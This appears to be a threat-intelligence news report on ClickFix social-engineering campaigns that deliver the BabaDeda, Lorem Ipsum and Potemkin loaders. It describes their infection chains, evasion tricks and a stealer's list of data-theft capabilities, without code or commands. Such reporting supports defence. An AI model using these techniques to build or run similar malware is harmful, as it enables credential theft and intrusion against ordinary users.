Several ClickFix campaigns have been identified by cybersecurity researchers, introducing three distinct malware loaders known as BabaDeda Loader, Lorem Ipsum Loader, and Potemkin. This information has been reported independently by Morphisec, BlueVoyant, and Huntress, respectively.
Reports indicate that attacks linked to BabaDeda Loader, which were observed in April 2026, have specifically targeted educational and financial institutions.
Morphisec researcher Shmuel Uzan highlighted the evolution of BabaDeda Loader, stating, “This new framework keeps that same code genome but expands it into a far more capable loader built for stealth, evasion, and payload flexibility.”
These attacks typically begin with a ClickFix social engineering strategy that tricks users into executing attacker-supplied PowerShell commands to deploy the loader. Subsequently, the loader is utilized to distribute information stealers and remote access trojans (RATs) by incorporating well-known techniques such as hidden PowerShell, in-memory shellcode, DLL side-loading, and external payload storage.
The activity has been connected to BabaDeda, a crypter service initially identified by Morphisec in November 2021 in a campaign targeting cryptocurrency and Web3 sectors. The loader is engineered to profile the host, avoid running on Russian or Belarusian systems, and execute security product-related checks before delivering the main payload.
One of the malware variants distributed through BabaDeda Loader is a .NET backdoor and information stealer with capabilities such as collecting system information, retrieving browser profiles, extracting browser artifacts, traversing directories, capturing screenshots, executing commands, transferring data to a C2 server, and utilizing native Windows APIs for various operations.
- Collecting detailed system information
- Discovering installed browser profiles
- Extracting browser artifacts such as cookies, browsing history, saved credentials, preferences, and local-state encryption keys
- Traversing directories and selecting files based on configurable rules
- Reading and exfiltrating file contents
- Capturing screenshots and displaying information
- Executing shell commands or external processes and collecting output
- Transferring data back to the C2 server
- Using native Windows APIs for process interaction, memory operations, DPAPI access, Restart Manager behavior, and advanced file access
Another attack chain deploys a ZIP archive using DLL side-loading to launch DanaBot and SectopRAT. These attacks stand out for utilizing a staged loader component named Storage Crypter, which retrieves payload materials from external storage-like files.
Morphisec emphasized the stealthy nature of these attacks, stating, “The visible application package appears legitimate, while malicious payloads remain hidden inside externally stored containers and are decoded only moments before execution.”
This discovery underscores the evolution of modern loader frameworks, which have transitioned towards modular structures that separate delivery, storage, execution, and payload deployment into distinct components.
ClickFix Campaign Deploys Lorem Ipsum Loader
Another active campaign leveraging the ClickFix technique utilizes compromised WordPress sites to distribute a new loader and backdoor known as Lorem Ipsum Loader. The compromised websites belong to various sectors, including architecture, legal services, and construction technology.
This shift in delivery methods is a response to Microsoft’s actions against Fox Tempest, a threat actor involved in a malware-signing-as-a-service operation. The new delivery mechanism eliminates code signing entirely.
These attacks signify the adaptability of threat actors in changing their initial access techniques. The Lorem Ipsum ecosystem has been associated with a financially motivated threat actor named Vanilla Tempest, known for deploying ransomware families like Rhysida, BlackCat, Zeppelin, and Quantum Locker.
The attack sequences involving Lorem Ipsum Loader utilize ClickFix-style Edge web browser security update lures to execute a malicious command that downloads a ZIP file and an outdated version of Node.js to deploy JavaScript-based payloads stealthily.
The JavaScript payload acts as a dropper for additional malware components, including a batch script for persistence and a DLL side-loading chain to decode the embedded Lorem Ipsum Loader payload.
BlueVoyant highlighted the backdoor’s functionality, stating, “The Lorem Ipsum chain culminates in handoff to Rapid Brigantine’s established post-exploitation tooling and ultimately to their documented ransomware deployments, primarily Rhysida.”
Potemkin, RMMProject, and EtherRAT Delivered via ClickFix
A sophisticated attack chain in a third campaign involves installing an MSI package that drops the Potemkin loader via an HTML Application (HTA) payload. This loader serves as a conduit for EtherRAT and RMMProject, enabling remote screen control and browser credential theft.
RMMProject includes a task dispatcher mechanism to perform various actions, such as taking screenshots, siphoning browser data, executing Lua scripts, terminating processes, and downloading additional modules at runtime.
Huntress researchers described Potemkin loader as a custom x64 loader designed with a domain generation algorithm to discover its C2 and load follow-on modules in memory. The loader supports various components for victim identification, task polling, DLL execution, and secure C2 communication.
The threat actor behind these attacks reportedly engaged in configuring security exclusions, deploying reverse SOCKS tunnels, conducting reconnaissance, setting up persistent access through Cloudflare tunnels, and spreading EtherRAT across multiple hosts.
ClickFix Continues to Persist
ClickFix remains a prevalent technique for targeting Windows and macOS users through fraudulent bot verification screens, delivering malware like Phexia Stealer and HellsUchecker. These campaigns have exploited the interest in artificial intelligence tools to distribute malicious payloads.
Despite efforts to combat such attacks, threat actors continue to adapt, showcasing the enduring effectiveness of ClickFix in exploiting human behavior. Apple has responded to the threat by introducing security alerts in macOS Tahoe 26.4 to caution users against running potentially harmful commands.
